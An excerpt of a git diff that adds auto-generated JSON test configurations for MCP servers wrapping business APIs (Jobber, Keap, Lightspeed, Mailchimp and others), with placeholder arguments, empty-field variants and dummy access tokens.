"query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-lastName": { + "args": { + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "", + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-query": { + "args": { + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "query": "", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-sortField": { + "args": { + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "query": "test query", + "page": 50, + "sortField": "", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-sortOrder": { + "args": { + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "" + }, + "expect": "exists" + }, + "list_mailboxes": { + "args": { + "page": 50 + }, + "expect": "content && content.length > 0" + }, + "search": { + "args": { + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "content && content.length > 0" + }, + "search:empty-sortField": { + "args": { + "query": "test query", + "page": 50, + "sortField": "", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "search:empty-sortOrder": { + "args": { + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/helpscout.json b/factory-tools/test-configs/helpscout.json new file mode 100644 index 0000000..7d6c118 --- /dev/null +++ b/factory-tools/test-configs/helpscout.json @@ -0,0 +1,11 
@@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/helpscout/dist/index.js" + ], + "env": { + "HELPSCOUT_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/housecall-pro-tests.json b/factory-tools/test-configs/housecall-pro-tests.json new file mode 100644 index 0000000..aa6bf76 --- /dev/null +++ b/factory-tools/test-configs/housecall-pro-tests.json @@ -0,0 +1,227 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/housecall-pro/dist/index.js" + ], + "env": { + "HOUSECALL_PRO_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_jobs": { + "args": { + "page": 50, + "per_page": 50, + "status": "unscheduled", + "customer_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_jobs:empty-status": { + "args": { + "page": 50, + "per_page": 50, + "status": "", + "customer_id": "test-id-123" + }, + "expect": "exists" + }, + "list_jobs:empty-customer_id": { + "args": { + "page": 50, + "per_page": 50, + "status": "unscheduled", + "customer_id": "" + }, + "expect": "exists" + }, + "get_job": { + "args": { + "id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_job": { + "args": { + "customer_id": "test-id-123", + "address_id": "test-id-123", + "description": "test_value", + "scheduled_start": "test_value", + "scheduled_end": "test_value", + "assigned_employee_ids": [], + "tags": [] + }, + "expect": "content && content.length > 0" + }, + "create_job:empty-address_id": { + "args": { + "customer_id": "test-id-123", + "address_id": "", + "description": "test_value", + "scheduled_start": "test_value", + "scheduled_end": "test_value", + "assigned_employee_ids": [], + "tags": [] + }, + "expect": "exists" + }, + "create_job:empty-description": { + "args": { + "customer_id": "test-id-123", + "address_id": 
"test-id-123", + "description": "", + "scheduled_start": "test_value", + "scheduled_end": "test_value", + "assigned_employee_ids": [], + "tags": [] + }, + "expect": "exists" + }, + "create_job:empty-scheduled_start": { + "args": { + "customer_id": "test-id-123", + "address_id": "test-id-123", + "description": "test_value", + "scheduled_start": "", + "scheduled_end": "test_value", + "assigned_employee_ids": [], + "tags": [] + }, + "expect": "exists" + }, + "create_job:empty-scheduled_end": { + "args": { + "customer_id": "test-id-123", + "address_id": "test-id-123", + "description": "test_value", + "scheduled_start": "test_value", + "scheduled_end": "", + "assigned_employee_ids": [], + "tags": [] + }, + "expect": "exists" + }, + "list_estimates": { + "args": { + "page": 50, + "per_page": 50, + "status": "pending", + "customer_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_estimates:empty-status": { + "args": { + "page": 50, + "per_page": 50, + "status": "", + "customer_id": "test-id-123" + }, + "expect": "exists" + }, + "list_estimates:empty-customer_id": { + "args": { + "page": 50, + "per_page": 50, + "status": "pending", + "customer_id": "" + }, + "expect": "exists" + }, + "create_estimate": { + "args": { + "customer_id": "test-id-123", + "address_id": "test-id-123", + "message": "test_value", + "options": [] + }, + "expect": "content && content.length > 0" + }, + "create_estimate:empty-address_id": { + "args": { + "customer_id": "test-id-123", + "address_id": "", + "message": "test_value", + "options": [] + }, + "expect": "exists" + }, + "create_estimate:empty-message": { + "args": { + "customer_id": "test-id-123", + "address_id": "test-id-123", + "message": "", + "options": [] + }, + "expect": "exists" + }, + "list_customers": { + "args": { + "page": 50, + "per_page": 50, + "q": "test_value", + "sort": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-q": { + "args": { + "page": 50, + 
"per_page": 50, + "q": "", + "sort": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-sort": { + "args": { + "page": 50, + "per_page": 50, + "q": "test_value", + "sort": "" + }, + "expect": "exists" + }, + "list_invoices": { + "args": { + "page": 50, + "per_page": 50, + "status": "draft", + "customer_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_invoices:empty-status": { + "args": { + "page": 50, + "per_page": 50, + "status": "", + "customer_id": "test-id-123" + }, + "expect": "exists" + }, + "list_invoices:empty-customer_id": { + "args": { + "page": 50, + "per_page": 50, + "status": "draft", + "customer_id": "" + }, + "expect": "exists" + }, + "list_employees": { + "args": { + "page": 50, + "per_page": 50, + "active": true + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/housecall-pro.json b/factory-tools/test-configs/housecall-pro.json new file mode 100644 index 0000000..89fd291 --- /dev/null +++ b/factory-tools/test-configs/housecall-pro.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/housecall-pro/dist/index.js" + ], + "env": { + "HOUSECALL_PRO_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/jobber-tests.json b/factory-tools/test-configs/jobber-tests.json new file mode 100644 index 0000000..b524b6f --- /dev/null +++ b/factory-tools/test-configs/jobber-tests.json @@ -0,0 +1,272 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/jobber/dist/index.js" + ], + "env": { + "JOBBER_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_jobs": { + "args": { + "first": 50, + "after": "test_value" + }, + "expect": "content && 
content.length > 0" + }, + "list_jobs:empty-after": { + "args": { + "first": 50, + "after": "" + }, + "expect": "exists" + }, + "get_job": { + "args": { + "id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_job": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "instructions": "test_value", + "startAt": "test_value", + "endAt": "test_value", + "lineItems": [] + }, + "expect": "content && content.length > 0" + }, + "create_job:empty-instructions": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "instructions": "", + "startAt": "test_value", + "endAt": "test_value", + "lineItems": [] + }, + "expect": "exists" + }, + "create_job:empty-startAt": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "instructions": "test_value", + "startAt": "", + "endAt": "test_value", + "lineItems": [] + }, + "expect": "exists" + }, + "create_job:empty-endAt": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "instructions": "test_value", + "startAt": "test_value", + "endAt": "", + "lineItems": [] + }, + "expect": "exists" + }, + "list_quotes": { + "args": { + "first": 50, + "after": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_quotes:empty-after": { + "args": { + "first": 50, + "after": "" + }, + "expect": "exists" + }, + "create_quote": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "message": "test_value", + "lineItems": [] + }, + "expect": "content && content.length > 0" + }, + "create_quote:empty-message": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "message": "", + "lineItems": [] + }, + "expect": "exists" + }, + "list_invoices": { + "args": { + "first": 50, + "after": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_invoices:empty-after": { + "args": { + "first": 50, + "after": "" + }, + "expect": "exists" + }, + "list_clients": { + "args": { + "first": 50, + 
"after": "test_value", + "searchTerm": "test query" + }, + "expect": "content && content.length > 0" + }, + "list_clients:empty-after": { + "args": { + "first": 50, + "after": "", + "searchTerm": "test query" + }, + "expect": "exists" + }, + "list_clients:empty-searchTerm": { + "args": { + "first": 50, + "after": "test_value", + "searchTerm": "" + }, + "expect": "exists" + }, + "create_client": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "test_value", + "city": "test_value", + "province": "test_value", + "postalCode": "javascript" + }, + "expect": "content && content.length > 0" + }, + "create_client:empty-companyName": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "test_value", + "city": "test_value", + "province": "test_value", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-email": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "", + "phone": "test_value", + "street1": "test_value", + "city": "test_value", + "province": "test_value", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-phone": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "", + "street1": "test_value", + "city": "test_value", + "province": "test_value", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-street1": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "", + "city": "test_value", + 
"province": "test_value", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-city": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "test_value", + "city": "", + "province": "test_value", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-province": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "test_value", + "city": "test_value", + "province": "", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-postalCode": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "test_value", + "city": "test_value", + "province": "test_value", + "postalCode": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/jobber.json b/factory-tools/test-configs/jobber.json new file mode 100644 index 0000000..3caab9b --- /dev/null +++ b/factory-tools/test-configs/jobber.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/jobber/dist/index.js" + ], + "env": { + "JOBBER_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/keap-tests.json b/factory-tools/test-configs/keap-tests.json new file mode 100644 index 0000000..0ece40e --- /dev/null +++ b/factory-tools/test-configs/keap-tests.json @@ -0,0 +1,444 @@ +{ + "server": { + "command": "node", + "args": [ + 
"/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/keap/dist/index.js" + ], + "env": { + "KEAP_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_contacts": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_contacts:empty-email": { + "args": { + "limit": 50, + "offset": 50, + "email": "", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-given_name": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-family_name": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-order": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-order_direction": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "", + "since": "test_value", + "until": "test_value" + }, + "expect": "exists" + }, + 
"list_contacts:empty-since": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "", + "until": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-until": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "" + }, + "expect": "exists" + }, + "get_contact": { + "args": { + "id": 50, + "optional_properties": [] + }, + "expect": "content && content.length > 0" + }, + "create_contact": { + "args": { + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "lead_source_id": 50, + "opt_in_reason": "test_value", + "source_type": "WEBFORM", + "custom_fields": [] + }, + "expect": "content && content.length > 0" + }, + "create_contact:empty-given_name": { + "args": { + "email_addresses": [], + "given_name": "", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "lead_source_id": 50, + "opt_in_reason": "test_value", + "source_type": "WEBFORM", + "custom_fields": [] + }, + "expect": "exists" + }, + "create_contact:empty-family_name": { + "args": { + "email_addresses": [], + "given_name": "Test Name", + "family_name": "", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "lead_source_id": 50, + "opt_in_reason": "test_value", + "source_type": "WEBFORM", + "custom_fields": [] + }, + "expect": "exists" + }, + "create_contact:empty-job_title": { + "args": { + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "", + 
"lead_source_id": 50, + "opt_in_reason": "test_value", + "source_type": "WEBFORM", + "custom_fields": [] + }, + "expect": "exists" + }, + "create_contact:empty-opt_in_reason": { + "args": { + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "lead_source_id": 50, + "opt_in_reason": "", + "source_type": "WEBFORM", + "custom_fields": [] + }, + "expect": "exists" + }, + "create_contact:empty-source_type": { + "args": { + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "lead_source_id": 50, + "opt_in_reason": "test_value", + "source_type": "", + "custom_fields": [] + }, + "expect": "exists" + }, + "update_contact": { + "args": { + "id": 50, + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "custom_fields": [] + }, + "expect": "content && content.length > 0" + }, + "update_contact:empty-given_name": { + "args": { + "id": 50, + "email_addresses": [], + "given_name": "", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "custom_fields": [] + }, + "expect": "exists" + }, + "update_contact:empty-family_name": { + "args": { + "id": 50, + "email_addresses": [], + "given_name": "Test Name", + "family_name": "", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "custom_fields": [] + }, + "expect": "exists" + }, + "update_contact:empty-job_title": { + "args": { + "id": 50, + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "", + "custom_fields": [] + }, + "expect": "exists" + }, + "list_opportunities": 
{ + "args": { + "limit": 50, + "offset": 50, + "user_id": 50, + "stage_id": 50, + "search_term": "test query", + "order": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_opportunities:empty-search_term": { + "args": { + "limit": 50, + "offset": 50, + "user_id": 50, + "stage_id": 50, + "search_term": "", + "order": "test_value" + }, + "expect": "exists" + }, + "list_opportunities:empty-order": { + "args": { + "limit": 50, + "offset": 50, + "user_id": 50, + "stage_id": 50, + "search_term": "test query", + "order": "" + }, + "expect": "exists" + }, + "list_tasks": { + "args": { + "limit": 50, + "offset": 50, + "contact_id": 50, + "user_id": 50, + "completed": true, + "since": "test_value", + "until": "test_value", + "order": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_tasks:empty-since": { + "args": { + "limit": 50, + "offset": 50, + "contact_id": 50, + "user_id": 50, + "completed": true, + "since": "", + "until": "test_value", + "order": "test_value" + }, + "expect": "exists" + }, + "list_tasks:empty-until": { + "args": { + "limit": 50, + "offset": 50, + "contact_id": 50, + "user_id": 50, + "completed": true, + "since": "test_value", + "until": "", + "order": "test_value" + }, + "expect": "exists" + }, + "list_tasks:empty-order": { + "args": { + "limit": 50, + "offset": 50, + "contact_id": 50, + "user_id": 50, + "completed": true, + "since": "test_value", + "until": "test_value", + "order": "" + }, + "expect": "exists" + }, + "create_task": { + "args": { + "title": "test_value", + "description": "test_value", + "contact": {}, + "due_date": "test_value", + "priority": 50, + "type": "test_value", + "user_id": 50, + "remind_time": 50 + }, + "expect": "content && content.length > 0" + }, + "create_task:empty-description": { + "args": { + "title": "test_value", + "description": "", + "contact": {}, + "due_date": "test_value", + "priority": 50, + "type": "test_value", + "user_id": 50, + "remind_time": 50 + }, + 
"expect": "exists" + }, + "create_task:empty-due_date": { + "args": { + "title": "test_value", + "description": "test_value", + "contact": {}, + "due_date": "", + "priority": 50, + "type": "test_value", + "user_id": 50, + "remind_time": 50 + }, + "expect": "exists" + }, + "create_task:empty-type": { + "args": { + "title": "test_value", + "description": "test_value", + "contact": {}, + "due_date": "test_value", + "priority": 50, + "type": "", + "user_id": 50, + "remind_time": 50 + }, + "expect": "exists" + }, + "list_tags": { + "args": { + "limit": 50, + "offset": 50, + "category": 50, + "name": "Test Name" + }, + "expect": "content && content.length > 0" + }, + "list_tags:empty-name": { + "args": { + "limit": 50, + "offset": 50, + "category": 50, + "name": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/keap.json b/factory-tools/test-configs/keap.json new file mode 100644 index 0000000..0855996 --- /dev/null +++ b/factory-tools/test-configs/keap.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/keap/dist/index.js" + ], + "env": { + "KEAP_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/lightspeed-tests.json b/factory-tools/test-configs/lightspeed-tests.json new file mode 100644 index 0000000..556de45 --- /dev/null +++ b/factory-tools/test-configs/lightspeed-tests.json @@ -0,0 +1,377 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/lightspeed/dist/index.js" + ], + "env": { + "LIGHTSPEED_ACCESS_TOKEN": "factory_discovery_dummy", + "LIGHTSPEED_ACCOUNT_ID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_sales": { + "args": { + "limit": 50, + "offset": 50, + "completed": true, + "timeStamp": "test_value", + 
"employeeID": "test-id-123", + "shopID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_sales:empty-timeStamp": { + "args": { + "limit": 50, + "offset": 50, + "completed": true, + "timeStamp": "", + "employeeID": "test-id-123", + "shopID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_sales:empty-employeeID": { + "args": { + "limit": 50, + "offset": 50, + "completed": true, + "timeStamp": "test_value", + "employeeID": "", + "shopID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_sales:empty-shopID": { + "args": { + "limit": 50, + "offset": 50, + "completed": true, + "timeStamp": "test_value", + "employeeID": "test-id-123", + "shopID": "", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_sales:empty-load_relations": { + "args": { + "limit": 50, + "offset": 50, + "completed": true, + "timeStamp": "test_value", + "employeeID": "test-id-123", + "shopID": "test-id-123", + "load_relations": "" + }, + "expect": "exists" + }, + "get_sale": { + "args": { + "sale_id": "test-id-123", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_sale:empty-load_relations": { + "args": { + "sale_id": "test-id-123", + "load_relations": "" + }, + "expect": "exists" + }, + "list_items": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "test-id-123", + "description": "test_value", + "upc": "test_value", + "customSku": "test_value", + "archived": true, + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_items:empty-categoryID": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "", + "manufacturerID": "test-id-123", + "description": "test_value", + "upc": "test_value", + "customSku": "test_value", + "archived": true, + "load_relations": "test_value" + }, + "expect": "exists" + }, + 
"list_items:empty-manufacturerID": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "", + "description": "test_value", + "upc": "test_value", + "customSku": "test_value", + "archived": true, + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_items:empty-description": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "test-id-123", + "description": "", + "upc": "test_value", + "customSku": "test_value", + "archived": true, + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_items:empty-upc": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "test-id-123", + "description": "test_value", + "upc": "", + "customSku": "test_value", + "archived": true, + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_items:empty-customSku": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "test-id-123", + "description": "test_value", + "upc": "test_value", + "customSku": "", + "archived": true, + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_items:empty-load_relations": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "test-id-123", + "description": "test_value", + "upc": "test_value", + "customSku": "test_value", + "archived": true, + "load_relations": "" + }, + "expect": "exists" + }, + "get_item": { + "args": { + "item_id": "test-id-123", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_item:empty-load_relations": { + "args": { + "item_id": "test-id-123", + "load_relations": "" + }, + "expect": "exists" + }, + "update_inventory": { + "args": { + "item_shop_id": "test-id-123", + "qoh": 50, + "reorderPoint": 50, + "reorderLevel": 50 + }, + "expect": "content && content.length > 0" + }, + "list_customers": { + "args": { + 
"limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "customerTypeID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-firstName": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "customerTypeID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-lastName": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "", + "email": "test@example.com", + "phone": "test_value", + "customerTypeID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-email": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "", + "phone": "test_value", + "customerTypeID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-phone": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "", + "customerTypeID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-customerTypeID": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "customerTypeID": "", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-load_relations": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "customerTypeID": "test-id-123", + "load_relations": "" + }, + "expect": "exists" + }, + "list_categories": { + "args": { + "limit": 50, + 
"offset": 50, + "parentID": "test-id-123", + "name": "Test Name", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_categories:empty-parentID": { + "args": { + "limit": 50, + "offset": 50, + "parentID": "", + "name": "Test Name", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_categories:empty-name": { + "args": { + "limit": 50, + "offset": 50, + "parentID": "test-id-123", + "name": "", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_categories:empty-load_relations": { + "args": { + "limit": 50, + "offset": 50, + "parentID": "test-id-123", + "name": "Test Name", + "load_relations": "" + }, + "expect": "exists" + }, + "get_register": { + "args": { + "register_id": "test-id-123", + "shopID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_register:empty-register_id": { + "args": { + "register_id": "", + "shopID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "get_register:empty-shopID": { + "args": { + "register_id": "test-id-123", + "shopID": "", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "get_register:empty-load_relations": { + "args": { + "register_id": "test-id-123", + "shopID": "test-id-123", + "load_relations": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/lightspeed.json b/factory-tools/test-configs/lightspeed.json new file mode 100644 index 0000000..4fb058b --- /dev/null +++ b/factory-tools/test-configs/lightspeed.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/lightspeed/dist/index.js" + ], + "env": { + "LIGHTSPEED_ACCESS_TOKEN": "factory_discovery_dummy", + "LIGHTSPEED_ACCOUNT_ID": "factory_discovery_dummy" + } + } +} \ No newline at end of 
file diff --git a/factory-tools/test-configs/mailchimp-tests.json b/factory-tools/test-configs/mailchimp-tests.json new file mode 100644 index 0000000..cb7a57d --- /dev/null +++ b/factory-tools/test-configs/mailchimp-tests.json @@ -0,0 +1,156 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/mailchimp/dist/index.js" + ], + "env": { + "MAILCHIMP_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_campaigns": { + "args": { + "count": 50, + "offset": 50, + "status": "save", + "type": "regular" + }, + "expect": "content && content.length > 0" + }, + "list_campaigns:empty-status": { + "args": { + "count": 50, + "offset": 50, + "status": "", + "type": "regular" + }, + "expect": "exists" + }, + "list_campaigns:empty-type": { + "args": { + "count": 50, + "offset": 50, + "status": "save", + "type": "" + }, + "expect": "exists" + }, + "get_campaign": { + "args": { + "campaign_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_campaign": { + "args": { + "type": "regular", + "list_id": "test-id-123", + "subject_line": "test_value", + "preview_text": "Sample content for testing", + "title": "test_value", + "from_name": "Test Name", + "reply_to": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_campaign:empty-preview_text": { + "args": { + "type": "regular", + "list_id": "test-id-123", + "subject_line": "test_value", + "preview_text": "", + "title": "test_value", + "from_name": "Test Name", + "reply_to": "test_value" + }, + "expect": "exists" + }, + "create_campaign:empty-title": { + "args": { + "type": "regular", + "list_id": "test-id-123", + "subject_line": "test_value", + "preview_text": "Sample content for testing", + "title": "", + "from_name": "Test Name", + "reply_to": "test_value" + }, + "expect": "exists" + }, + "send_campaign": { + "args": { + "campaign_id": "test-id-123" + }, + "expect": "content && content.length > 
